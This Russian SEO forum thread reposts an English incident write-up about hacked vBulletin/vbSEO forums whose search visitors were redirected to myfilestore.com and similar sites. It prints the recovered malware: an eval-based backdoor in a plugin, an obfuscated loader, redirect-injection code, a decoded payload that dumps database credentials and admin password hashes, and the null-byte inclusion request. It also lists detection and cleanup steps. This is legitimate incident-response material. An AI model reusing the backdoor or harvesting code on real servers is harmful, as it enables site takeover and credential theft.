Вернуться   SEO форум - оптимизация и продвижение сайтов > Web разработки > Разработка форумов > vBulletin

Важная информация
vBulletin - Форум vBulletin. Установка, настройка движка vBulletin. SEO утилиты (vbSEO), темы, стили...

Ответ
 
Опции темы Оценить тему Опции просмотра
Старый 02.08.2013, 19:00   #1
 
Аватар для Alex LM
 
Сообщений: 973
FR (активность): 256,218

Доп. информация
По умолчанию Автор темы vBulletin, vbSEO и редирект с поиска (Яндекс, Google) на myfilestore.com (file2store.info и т.д.)

Давно известны проблемы с безопасностью продукта vbSEO ( http://www.seocafe.info/vbulletin/119-vbseo.html ).

В данной теме, речь о уязвимости, которая перенаправляет посетителей с поисковиков (Яндекс, Гугл и т.д.) на "левые" страницы (часто myfilestore.com, file2store.info и т.д.).

Сообщение, например:
URL: http://www.forum/misc.php?v...
Process: ...
Infection: HTML:RedirDL-inf [Trj]


Другими словами, те кто переходят с поисковиков на Ваш форум, попадают сперва на myfilestore.com.
Что характерно, такой редирект работает 1 раз (около того) в сутки. Последующие переходы (в течении суток) с поиска происходят нормально (на форум).

В целом форум работает нормально, в этом все коварство уязвимости "редирект на myfilestore.com".
Понятное дело, такие редиректы мало нравятся поисковикам. Длительное паразитирование практически наверняка приведет к понижению форума в результате выдаче (обычно, проявляется резким обвалом трафика)

Ближе к делу, решение проблемы - http://club.myce.com/f20/vbulletin-m...e-them-332219/
+ копипаст, на случай не работающего первоисточника:
Оффтоп:
For our Myce members - This post is to inform fellow Vbulletin owners with information from a hack we suffered from. This should not have affected our users.

We have been working hard together with fellow forum owners in solving a redirection issue that seems to be infecting thousands of Vbulletin sites. Instead of giving you the usual advice, we have been able to trace back most of the works of this malware and provide some real working fixes.

Please link to this thread so it gets on top in Google and makes sure we help a lot of other Vbulletin owners!

Index
  1. What happens?
  2. How to find out if you are infected?
  3. What do they do?
  4. How do they get access to your admincp?
  5. What countermeasures can be taken?
  6. Remaining questions

What happens?

If people come from search engines like Google, Bing, Yahoo, Yandex, Rambler or Baidu they end up on another site than yours. They are redirected to any of these sites (please tell us when one is missing)
  • myfilestore.com
  • filestore72.info
  • file2store.info
  • url2short.info
  • filestore123.info
  • url123.info
  • dollarade.com

myfilestore.com and related sites

These websites appear to be affiliate sites that let's you download something. Most likely once the installation is done the 'hackers' will receive a fee or they try to infect people with malware. It's always a good idea to do additional virus scanning when you've ended up on that page. We've also submitted the domains to Google which will hopefully take measures.

How to find out your forum is infected?

Most likely your visitors will report that they are redirected to another site when trying to visit your site from search engines. They will likely note one of the sites in the list above.

To reproduce yourself:
  1. Open a private/incognito window in your browser or clear cache and cookies
  2. Go to either Google, Bing, Yahoo, Yandex, Rambler or Baidu
  3. Search for a term of which you know your site will appear in the search engine
  4. Click a result
  5. If nothing happens, it might be wise to try a couple of times to be sure you're not infected

Besides that, check your datastore:
  • If you're using a file based datastore then get it from /includes/datastore/datastore_cache.php
  • In the database, table datastore and field pluginslist

In either one, best to even check both, search for strange code, think about long strings containing random characters, hashes or anything else unusual. The code injected to our site was this:

PHP Code:
$o = 'b5e20b9bb877342f907b745fdd1f42bd';
$vbg = '<LONG LINE OF ENCODED CRAP WHICH WE REMOVED FOR READABILITY>;
$xml = '
$z#rB&_K=ZN;Es4tA6xgw/dof05eU~`:[k3{^ycF}<JbqGM7V!1au,l*[email protected]%j(>C9YT)PR?"X-pQni]LDmO|W2vISh';
$xml2 = '&sL8VZ`g[c+4]N~l3.:0}XwtB>=iebv/FJ*RP,6HO2(?Q_EjK7;[email protected]!5rf)U1{nz#dkmGau^yp$<| M%DW-qI"xA';
$as = '#c#'.substr($vbg, 365, 1);
$vbt = preg_replace($as, strtr($vbg, $xml, $xml2), 'css');

The criminals also seem to inject code in plugins. It's a bit hard to find it and they appear to use different methods. It's very important however that you find this, with their code they have your site under full control.

Plugin code we found so far

By going through all hooks in misc.php we found that in this file there are only hooks that start with 'misc'.

We went in the plugin manager and searched for plugins that hook into anything start with 'misc'. In our installation there were only six. By manually opening them we found out that in the plugin 'vBSEO Misc Start' that hooks into 'misc_start' the following code was inserted:

PHP Code:
if(defined('VBSEO_ENABLED')) {
vbseo_complete_sec('misc_start');
}
if(isset(
$_REQUEST['e']) && $_REQUEST['do'] == 'config') {
eval(
$_REQUEST['e']);
die();
}

This means that our server is wide open to hackers. The eval() command can be used to excute any PHP code on our servers and this code could be fed to eval() by adding some <?php ?> wrapped code to the 'e' parameter.

While we're not sure if we closed the loophole completely. This code is the first thing to disable. You can remove the last 4 lines completely or just comment out the eval line. We added a nice surprise for the hackers if they are calling it again.

An another plugin, reported by Scott. We don't immediately understand why they add this as the code doesn't seem to be harmfull.

PHP Code:
if(preg_match("/image|do=|dateline/i",$_ENV['REQUEST_URI']) || isset($_ENV['QUERY_STRING']) || isset($_POST)) { } else { ob_start(); ob_implicit_flush(1); flush(); ob_flush();

The code they add to the plugins/datastore was decoded and looked like this:

PHP Code:
$q='ini_set';
if(
function_exists($q))
{
$q('display_errors',0);
$q('log_errors',0);
}

if(isset(
$_POST[$o]))
eval(
base64_decode(str_rot13($_POST[$o])));

$u[email protected]preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);
$s[email protected]parse_url($_SERVER['HTTP_REFERER']);
$t[email protected]$s['host'];
$r[email protected]preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|r ambler\.ru|baidu\.#i',$t);
$h[email protected]$_SERVER['HTTP_HOST'];
$p[email protected]COOKIE_PREFIX;
$a[email protected]THIS_SCRIPT==='misc';
$c=$p.'lastvisit';
$n=$p.'lang_id';
$y[email protected]ord(FILE_VERSION)>51;
$z=empty($_SERVER['HTTP_X_MOZ']);
$j='<script type="text/javascript" src="'.$vbulletin->options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;g=js"></script>';

if(empty(
$_COOKIE[$n]))
{
if(
$a && isset($_GET['v']) && (isset($_GET['g'])) && (!empty($_COOKIE[$c])))
{
if(
$t==$h)
{
if(
$z)
setcookie($n,'en',time()+36000);
$m=substr(md5($h),0,8);
print(
"document.location='h**p://my****store.com/download.php?id={$m}'");
}
exit;
}
if((!
$u) && $r)
{
if(
$y)
{
$GLOBALS['template_hook']['headinclude_javascript'].=$j;
}
else
{
$GLOBALS['style']['css'].=$j;
}
}
}

This means we found out what the redirect caused. We recovered by saving some settings again which made the datastore to refresh and it was gone.

Besides the changes to the datastore and the plugins, we also found out that they are posting long strings of encoded data to sites. This looks like this:

PHP Code:
$_POST['<SOME KIND OF HASH>'] = 'MJAbolOgMQHbWmWwLmV3Mw ... < ENCODED CRAP ONE AGAIN > ... yzZGWuAmL1BQp5MQt5Z2D4Z2R2Z2MxMQSuWl.....';

And here's the decoded code, don't get scared! We decoded it using

PHP Code:
echo(base64_decode(str_rot13('encrypted string')));

(credits ovk)


PHP Code:
echo md5('3c4eb64c8db01a5ab261e18fdc16089e');$oa=array('ecnt'=>0);function weh($en, $es, $ef, $el){global $oa;$oa['e'][]=array($en,$es,$ef,$el);};set_error_handler('weh');ini_set('log_errors',0);ob_start();
gtadmndtas();

function
gtadmndtas()
{
$out = $bf = $h = '';
$ag = array();

if(
is_file('includes/config.php'))
{
include(
'includes/config.php');
if(
is_file('vbseo/resources/xml/config.xml'))
{
$bf = @file_get_contents('vbseo/resources/xml/config.xml');
}
}
elseif(
is_file('config.php'))
{
include(
'config.php');
if(
is_file('../vbseo/resources/xml/config.xml'))
{
$bf = @file_get_contents('../vbseo/resources/xml/config.xml');
}
}
else
{
echo
"BD error: config not found\n";
return;
}

if(!empty(
$bf))
{
$a = strpos($bf, '<name>VBSEO_ADMIN_PASSWORD</name>');
if(
$a !== false)
{
$a = strpos($bf, '<value>', $a + 10);
$b = strpos($bf, '</value>', $a + 7);
if((
$a !== false) && ($b !== false))
{
$h = substr($bf, $a + 7, $b - $a - 7);
}
}
}

$out .= "---------------=-=pong1234321=-=--------------------------<br>\n";
if(!empty(
$h))
{
$out .= "VBSH: {$h}<br>\n";
}
$out .= "ACP: {$config['Misc']['admincpdir']}<br>\n";
$out .= "dbtype: {$config['Database']['dbtype']}<br>\n";
$out .= "servername: {$config['MasterServer']['servername']}<br>\n";
$out .= "port: {$config['MasterServer']['port']}<br>\n";
$out .= "dbname: {$config['Database']['dbname']}<br>\n";
$out .= "username: {$config['MasterServer']['username']}<br>\n";
$out .= "password: {$config['MasterServer']['password']}<br>\n";
$out .= "tableprefix: {$config['Database']['tableprefix']}<br>\n";
$out .= "technicalemail: {$config['Database']['technicalemail']}<br>\n";
$out .= "-----------------------------------------<br>\n";

echo
$out;
$out = '';
$gt = "{$config['Database']['tableprefix']}usergroup";
$mt = "{$config['Database']['tableprefix']}user";

$mysql_conn = mysql_connect("{$config['MasterServer']['servername']}:{$config['MasterServer']['port']}", $config['MasterServer']['username'], $config['MasterServer']['password']);
if(!
$mysql_conn)
{
echo
"Mysql login failed!";
return;
}

if(!
mysql_select_db($config['Database']['dbname'], $mysql_conn))
{
echo
"Mysql database selection failed!";
return;
}

$sql = "SELECT usergroupid FROM $gt WHERE adminpermissions>1";
$res = mysql_query($sql);
if(!
$res)
{
$err = mysql_error($mysql_conn);
echo
"Mysql query failed: $err";
return;
}

while(
$row = mysql_fetch_assoc($res))
{
$ag[] = intval($row['usergroupid']);
}

$ags = implode(',',$ag);
$sql = "SELECT userid,username,email,usergroupid,password,salt FROM $mt WHERE usergroupid IN ($ags)";
$res = mysql_query($sql);
if(!
$res)
{
$err = mysql_error($mysql_conn);
echo
"Mysql query failed: $err";
return;
}

while(
$row = mysql_fetch_assoc($res))
{
$data = implode("|:|", $row);
$data = htmlentities($data);
$out .= "$data<br>\n";
}

$out .= "-----------------------------------------\n<br>\n";
echo
$out;
$out = '';
}
$out=ob_get_contents();ob_end_clean();$oa['d'][0]=$out;$out=serialize($oa);$out=gzcompress($out,9);$out=base64_encode($out);$out=str_replace('=','',$out);$out=str_rot13($out);echo($out);echo md5('117ae4783ac97ecf30b2419315518cd1');exit;

Or pastebin for increased readbililty: http://pastebin.com/cCd72uZN

What do they do?

We think this is it how they do it:
  1. Get access to the admin panel (see below)
  2. Add data to a plugin, both a method to open your entire server to them and the code that inserts javascript on your site and causes the redirection
  3. With this in place, they POST another encrypted string that executes code that reveals passwords etc and allows them to compromise whatever they want

How do they get access to your admin panel

This part is still a bit guessing but we found some strange URLs being called on our server, we expect that they have more methods, but we can confirm at least one strange thing.

They request URLs like this:

PHP Code:
adminhash = *************************
128.2.142.104 160971 - [17/Apr/2013:16:19:43 +0200] "POST /?vbseourl%00=admincp/plugin.php"

Which seem to make use of an arbitrary PHP file inclusion issue:

http://www.madirish.net/397


What countermeasures can be taken?

The good news, A LOT!

Credits to ovk

Add this at the top of your yourforum/misc.php

PHP Code:
if($_GET['g']=='js') die;

This doesn't stop the actual hack, but stops the redirects. This prevents the javascript to execute. It's possible that they change variable names, so check your injected code if it's ['g'] or another character.

Credits to Liggy
  • Change the passwords of ALL users that have access to the admin panel or demote them to regular users until you know that they have changed their password. Since the hacker may have access to the users account, a confirmation via Instant Messenger would be best as the hacker could send a PM or fake the sender address of an email
  • In the admin panel go to Plugins&Products -> Plugin Manager and check everything that is hooked at misc_start for a code that contains eval($_REQUEST. In our forum that code was inserted into vBSEO Misc Start. They are trying to hide their traces by adding lots of empty lines which will not show their code unless you scroll down. This particular plugin (in the version we have) should only contain the following two lines PHP Code:
    if(defined('VBSEO_ENABLED'))
    vbseo_complete_sec('misc_start');
  • Go back to Plugin Manager, scroll to the end of the page and click Save Active Status. This should remove traces from the pluginlist entry in the datastore table.
  • This step may be optional with the previous one, but just to be sure go to vBulletin Options->vBulletin Options->User Banning options and click Save without changing anything. This should update the datastore_cache.php file
  • If possible, limit the access to your Admin Panel with an additional web server password using e.g. a .htaccess file and provide your admins with the login details.

To verify that there are no traces of the exploit left in your current installation, first take a look at your database. Search the data column in table datastore for the text strtr. (SELECT * FROM datastore WHERE data LIKE '%strtr%') - Future exploits may however use different ways of running their code - no universal method available.

Next check is looking at table adminutil if the entry with title datastore contains the text strtr.

Last step is checking file includes/datastore/datastore_cache.php for text strtr.

Credits to Liggy

Also add this code at the beginning of yourforum/vbseo.php

PHP Code:
if (strpos($_SERVER["QUERY_STRING"],'%00'))
die;

[EDIT by Liggy]You may also send them some greetings like we did [/EDIT]


Remaining questions
  • Did they get access to the admincp using an exploit/backdoor?
  • Did they get access by compromising an admin account, and how?
  • Are our counter measures succesful or will we face another attempt?

Bonus material

If you kept reading, well done! You might want to add some logging to see what's going on and help in our quest to find out everything. Here's some code that you can add to yourforum/includes/config.php

PHP Code:
function DumpToLog($DoPost=false)
{
$logfile[email protected]fopen('{Enter your path here}' . date('Ymd') . '.log',"a");
if (
$logfile)
{
if (
$_COOKIE["bbuserid"])
$bbuser=$_COOKIE["bbuserid"];
else
$bbuser='-';
if (isset(
$_SERVER["REMOTE_USER"]))
$ruser=$_SERVER["REMOTE_USER"];
else
$ruser='-';

fprintf(
$logfile,'%s %s %s [%s] "%s %s"%s',
$_SERVER['REMOTE_ADDR'],$bbuser,$ruser,date('d/M/Y:H:i:s O'),$_SERVER["REQUEST_METHOD"],$_SERVER["REQUEST_URI"],"\n"
);


if (
$DoPost && ($_SERVER["REQUEST_METHOD"]=="POST"))
{
echo
"POST data:\n";
foreach(
$_POST as $postvar=>$postvalue)
fprintf($logfile,"%s = %s\n",$postvar,$postvalue);
}

fclose($logfile);
}
}

DumpToLog(false);

You can change the call from DumpToLog(false) to DumpToLog(true) to also log the POST variables. However this can lead to very big log sizes and add sensitive data like passwords or password hashes to the log file.

(Once again, credits to Liggy!)

Please, if you're reading this and can provide us with additional information, REGISTER and post additional information, also questions are welcome.

Your questions might give us an additional path to trace down the origin of this hack.


Скрытый (как скрывать?) текст. Только для группы: "Администрация":
Ваша группа не позволяет просмотреть скрытую информацию.


Alex Life Mix – путешествия
Часто задаваемые вопросы форума по SEO и близкой тематике - SEO FAQ
Alex LM вне форума  
Ответить с цитированием Сказать Плохо за это бесполезное сообщение Быстрый ответ на это сообщение
"Спасибо" от:
СТЕПАН (03.08.2013)
Ответ

Метки
file2store.info, myfilestore.com, vbseo, vbulletin, vbulletin редирект, редирект google, редирект с яндекс

Быстрый ответ
Ваше имя пользователя: Регистрация. Для входа нажмите здесь
Случайный вопрос

Сообщение:
Опции
Внимание!
Этой теме более 2239 дней. Вы можете оставить сообщение здесь. Но, обращаем внимание. Возможно, рациональней создать новую тему (найти свежее обсуждение)?


Опции темы
Опции просмотра Оценка этой теме
Оценка этой теме:

Ваши права в разделе
Вы не можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Вопрос ] Сайт выпал из поиска Яндекс и +1000 посещений Яндекс-вебмастер Иван Потапов Яndex 7 28.02.2013 10:01
vbSEO. ЧПУ урлы в Vbulletin Klopopryg vBulletin 1 20.01.2012 02:32
Р - ранжирование, раздел сайта, раскрутка, редирект, результаты поиска, робот Jokeron SEO словарь 1 22.06.2011 19:44
vBulletin + vBSEO, отредактировать футер obama vBulletin 1 01.03.2011 11:20

Текущее время: 23:25. Часовой пояс GMT +3.